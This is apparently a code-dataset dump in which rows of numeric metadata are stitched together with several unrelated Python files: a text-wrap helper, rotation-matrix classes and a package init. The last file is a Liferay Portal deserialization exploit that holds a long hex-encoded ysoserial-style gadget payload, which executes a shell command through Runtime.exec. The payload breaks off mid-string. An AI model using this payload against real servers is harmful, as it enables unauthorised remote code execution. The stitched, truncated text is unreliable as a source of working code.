| 34.629734 | 112 | 0.582317 | 2,950 | 24,691 | 4.540339 | 0.066102 | 0.028222 | 0.045692 | 0.040765 | 0.90772 | 0.903838 | 0.891145 | 0.886964 | 0.880842 | 0.880842 | 0 | 0.015617 | 0.325746 | 24,691 | 712 | 113 | 34.678371 | 0.788924 | 0.085173 | 0 | 0.878893 | 0 | 0 | 0.516105 | 0.168412 | 0 | 0 | 0 | 0 | 0.034602 | 1 | 0.038062 | false | 0 | 0.010381 | 0 | 0.086505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eca69f2c2c9009213ed024a931e6f81576174619 | 113 | py | Python | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | 03 - Strings/Text Wrap.py | LynX-gh/HackerRank-python | 52705f423dd564463c67de1b8a2ded49bbef565e | [
"MIT"
] | null | null | null | import textwrap
def wrap(string, max_width):
wrap_string = '\n'.join(textwrap.wrap(string, max_width))
return wrap_string | 37.666667 | 61 | 0.725664 | 17 | 113 | 4.588235 | 0.529412 | 0.512821 | 0.333333 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141593 | 113 | 3 | 62 | 37.666667 | 0.804124 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
eca8f86c143795b64b85379dbf76bf5f1a85f26b | 842 | py | Python | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | eulerangles/rotations.py | brisvag/eulerangles | 3189cf850d5415defb89910d392f4b18d0188f3b | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from .conversions import theta2rotm
class RotX(np.ndarray):
"""
Rotation matrix or matrices for rotation around the x-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
        obj = theta2rotm(theta, axis='x')
        return obj
class RotY(np.ndarray):
"""
Rotation matrix or matrices for rotation around the y-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
        obj = theta2rotm(theta, axis='y')
        return obj
class RotZ(np.ndarray):
"""
    Rotation matrix or matrices for rotation around the z-axis by theta
positive is ccw when looking at the origin against the axis
"""
def __new__(cls, theta: np.ndarray):
        obj = theta2rotm(theta, axis='z')
        return obj
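# Minimal usage sketch (assumption: theta2rotm takes angles in radians and
# returns the matching rotation matrix or stack of matrices as an ndarray):
#   >>> Rx = RotX(np.array(np.pi / 2))  # 90 degrees ccw about the x-axis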
| 24.764706 | 71 | 0.671021 | 122 | 842 | 4.532787 | 0.303279 | 0.097649 | 0.092224 | 0.124774 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0.860759 | 0 | 0.00627 | 0.24228 | 842 | 33 | 72 | 25.515152 | 0.860502 | 0.454869 | 0 | 0.272727 | 0 | 0 | 0.007481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.181818 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ecf0dd4c32d64ab2dddfa7deaad041bf8a32412f | 228 | py | Python | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | 12 | 2019-12-07T18:37:34.000Z | 2022-03-30T14:23:38.000Z | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | null | null | null | moha/posthf/ci/__init__.py | ZhaoYilin/moha | d701fd921839474380982db1478e66f0dc8cbd98 | [
"MIT"
] | 2 | 2019-12-08T05:48:47.000Z | 2021-10-31T21:40:21.000Z | from __future__ import division, print_function
from __future__ import absolute_import
from moha.posthf.ci.auxiliary import *
from moha.posthf.ci.cis import *
from moha.posthf.ci.cisd import *
from moha.posthf.ci.fci import *
| 25.333333 | 47 | 0.807018 | 35 | 228 | 4.971429 | 0.4 | 0.229885 | 0.321839 | 0.45977 | 0.505747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118421 | 228 | 8 | 48 | 28.5 | 0.865672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.166667 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
01dcb9893516f8b41f619370adc26f855a4b247e | 17,869 | py | Python | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 1,007 | 2018-09-17T16:13:26.000Z | 2022-03-29T00:19:42.000Z | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 5 | 2018-11-11T09:54:27.000Z | 2020-06-24T22:59:49.000Z | Liferay Portal/image_bypass.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 325 | 2018-09-18T04:44:53.000Z | 2022-03-30T18:08:13.000Z | #
# Exploits deserialization on Liferay CE Portal 7.0 GA3 via
# the url: /api/liferay. Note that we may be restricted from
# this URL via an ACL.
#
# Usage example:
# python image_bypass.py 192.168.1.208 8080
#
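#
# The serialized payload below embeds a ysoserial-style TemplatesImpl gadget
# (ysoserial/payloads/util/Gadgets$StubTransletPayload); the command it runs
# on the target is `touch /tmp/image_bypass`, so check for that file to
# confirm code execution.
#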
import socket
import sys
if len(sys.argv) != 3:
print 'Usage: ./image_bypass.py <host> <port>'
sys.exit(0)
payload = '\xac\xed\x00\x05\x73\x72\x00\x30\x6a\x61\x76\x61\x78\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x52\x65\x6e\x64\x65\x72\x65\x64\x49\x6d\x61\x67\x65\x8a\x0a\x94\x12\xb0\x8e\x3c\x06\x03\x00\x16\x49\x00\x06\x68\x65\x69\x67\x68\x74\x5a\x00\x0e\x69\x73\x53\x6f\x75\x72\x63\x65\x52\x65\x6d\x6f\x74\x65\x49\x00\x08\x6d\x69\x6e\x54\x69\x6c\x65\x58\x49\x00\x08\x6d\x69\x6e\x54\x69\x6c\x65\x59\x49\x00\x04\x6d\x69\x6e\x58\x49\x00\x04\x6d\x69\x6e\x59\x49\x00\x09\x6e\x75\x6d\x58\x54\x69\x6c\x65\x73\x49\x00\x09\x6e\x75\x6d\x59\x54\x69\x6c\x65\x73\x49\x00\x04\x70\x6f\x72\x74\x49\x00\x0f\x74\x69\x6c\x65\x47\x72\x69\x64\x58\x4f\x66\x66\x73\x65\x74\x49\x00\x0f\x74\x69\x6c\x65\x47\x72\x69\x64\x59\x4f\x66\x66\x73\x65\x74\x49\x00\x0a\x74\x69\x6c\x65\x48\x65\x69\x67\x68\x74\x49\x00\x09\x74\x69\x6c\x65\x57\x69\x64\x74\x68\x5a\x00\x0b\x75\x73\x65\x44\x65\x65\x70\x43\x6f\x70\x79\x5a\x00\x0c\x75\x73\x65\x54\x69\x6c\x65\x43\x6f\x64\x65\x63\x49\x00\x05\x77\x69\x64\x74\x68\x4c\x00\x03\x55\x49\x44\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0d\x64\x65\x63\x6f\x64\x69\x6e\x67\x50\x61\x72\x61\x6d\x74\x00\x32\x4c\x6a\x61\x76\x61\x78\x2f\x6d\x65\x64\x69\x61\x2f\x6a\x61\x69\x2f\x74\x69\x6c\x65\x63\x6f\x64\x65\x63\x2f\x54\x69\x6c\x65\x43\x6f\x64\x65\x63\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x4c\x69\x73\x74\x3b\x4c\x00\x0d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x50\x61\x72\x61\x6d\x71\x00\x7e\x00\x02\x4c\x00\x0a\x66\x6f\x72\x6d\x61\x74\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x68\x6f\x73\x74\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x6e\x65\x74\x2f\x49\x6e\x65\x74\x41\x64\x64\x72\x65\x73\x73\x3b\x4c\x00\x0b\x69\x6d\x61\x67\x65\x42\x6f\x75\x6e\x64\x73\x74\x00\x14\x4c\x6a\x61\x76\x61\x2f\x61\x77\x74\x2f\x52\x65\x63\x74\x61\x6e\x67\x6c\x65\x3b\x78\x70\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x01\x01\x00\x00\x00\x01\x73\x72\x00\x14\x6a\x61\x76\x61\x2e\x6d\x61\x74\x68\x2e\x42\x69\x67\x49\x6e\x74\x65\x67\x65\x72\x8c\xfc\x9f\x1f\xa9\x3b\xfb\x1d\x03\x00\x06\x49\x00\x08\x62\x69\x74\x43\x6f\x75\x6e\x74\x49\x00\x09\x62\x69\x74\x4c\x65\x6e\x67\x74\x68\x49\x00\x13\x66\x69\x72\x73\x74\x4e\x6f\x6e\x7a\x65\x72\x6f\x42\x79\x74\x65\x4e\x75\x6d\x49\x00\x0c\x6c\x6f\x77\x65\x73\x74\x53\x65\x74\x42\x69\x74\x49\x00\x06\x73\x69\x67\x6e\x75\x6d\x5b\x00\x09\x6d\x61\x67\x6e\x69\x74\x75\x64\x65\x74\x00\x02\x5b\x42\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x00\x01\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\xd9\xe7\xd2\x66\x16\xd8\xfb\x1e\xc2\x2a\x2c\x10\x57\x01\x00\x00\x77\xa3\xac\x80\x61\xad\xe5\x3f\x78\x70\x70\x74\x00\x03\x72\x61\x77\x73\x72\x00\x14\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x49\x6e\x65\x74\x41\x64\x64\x72\x65\x73\x73\x2d\x9b\x57\xaf\x9f\xe3\xeb\xdb\x03\x00\x03\x49\x00\x07\x61\x64\x64\x72\x65\x73\x73\x49\x00\x06\x66\x61\x6d\x69\x6c\x79\x4c\x00\x08\x68\x6f\x73\x74\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x7f\x00\x01\x01\x00\x00\x00\x02\x74\x00\x06\x75\x62\x75\x6e\x74\x75\x78\x73\x72\x00\x12\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e\x52\x65\x63\x74\x61\x6e\x67\x6c\x65\xc3\xb0\x6a\x05\x1a\xca\x6a\x74\x02\x00\x04\x49\x00\x06\x68\x65\x69\x67\x68\x74\x49\x00\x05\x77\x69\x64\x74\x68\x49\x00\x01\x78\x49\x00\x01\x79\x78\x70\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x73\x72\x00\x26\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x53\x61\x6d\x70\x6c\x65\x4d\x6f\x64\x65\x6c\x53\x74\x61\x74\x65\x09\x43\x1b\xbd\xfd\xbb\xdf\x14\x03\x00\x00\x78\x72\x00\x2b\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x53\x74\x61\x74\x65\x49\x6d\x70\x6c\x00\x99\x9f\x6f\x39\x5a\x14\xba\x02\x00\x01\x4c\x00\x08\x74\x68\x65\x43\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x76\x72\x00\x2a\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e\x69\x6d\x61\x67\x65\x2e\x50\x69\x78\x65\x6c\x49\x6e\x74\x65\x72\x6c\x65\x61\x76\x65\x64\x53\x61\x6d\x70\x6c\x65\x4d\x6f\x64\x65\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x77\x18\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x75\x72\x00\x02\x5b\x49\x4d\xba\x60\x26\x76\xea\xb2\xa5\x02\x00\x00\x78\x70\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x78\x73\x72\x00\x25\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6d\x65\x64\x69\x61\x2e\x6a\x61\x69\x2e\x72\x6d\x69\x2e\x43\x6f\x6c\x6f\x72\x4d\x6f\x64\x65\x6c\x53\x74\x61\x74\x65\x4a\xbd\x88\x6f\x26\x2e\x15\x54\x03\x00\x00\x78\x71\x00\x7e\x00\x14\x76\x72\x00\x22\x6a\x61\x76\x61\x2e\x61\x77\x74\x2e\x69\x6d\x61\x67\x65\x2e\x43\x6f\x6d\x70\x6f\x6e\x65\x6e\x74\x43\x6f\x6c\x6f\x72\x4d\x6f\x64\x65\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x77\x0c\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x03\xe8\x75\x71\x00\x7e\x00\x19\x00\x00\x00\x03\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x08\x77\x0a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x78\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x74\x61\x62\x6c\x65\x13\xbb\x0f\x25\x21\x4a\xe4\xb8\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x08\x77\x08\x00\x00\x00\x0b\x00\x00\x00\x00\x78\x75\x71\x00\x7e\x00\x0b\x00\x00\x0a\xc7\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x72\x00\x2b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x62\x65\x61\x6e\x75\x74\x69\x6c\x73\x2e\x42\x65\x61\x6e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xe3\xa1\x88\xea\x73\x22\xa4\x48\x02\x00\x02\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x70\x65\x72\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x70\x73\x72\x00\x3f\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x73\x2e\x43\x6f\x6d\x70\x61\x72\x61\x62\x6c\x65\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xfb\xf4\x99\x25\xb8\x6e\xb1\x37\x02\x00\x00\x78\x70\x74\x00\x10\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x77\x04\x00\x00\x00\x03\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x04\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x06\x94\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x38\x07\x00\x36\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x07\x00\x04\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x07\x00\x06\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x0a\x00\x03\x00\x10\x0c\x00\x0c\x00\x0d\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x19\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x07\x00\x27\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e\x01\x00\x17\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x69\x6d\x61\x67\x65\x5f\x62\x79\x70\x61\x73\x73\x08\x00\x30\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x1e\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x31\x31\x35\x37\x37\x36\x36\x32\x30\x33\x30\x39\x33\x38\x32\x01\x00\x20\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x31\x31\x35\x37\x37\x36\x36\x32\x30\x33\x30\x39\x33\x38\x32\x3b\x00\x21\x00\x01\x00\x03\x00\x01\x00\x05\x00\x01\x00\x1a\x00\x07\x00\x08\x00\x01\x00\x09\x00\x00\x00\x02\x00\x0a\x00\x04\x00\x01\x00\x0c\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x0f\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2e\x00\x12\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x13\x00\x37\x00\x00\x00\x01\x00\x15\x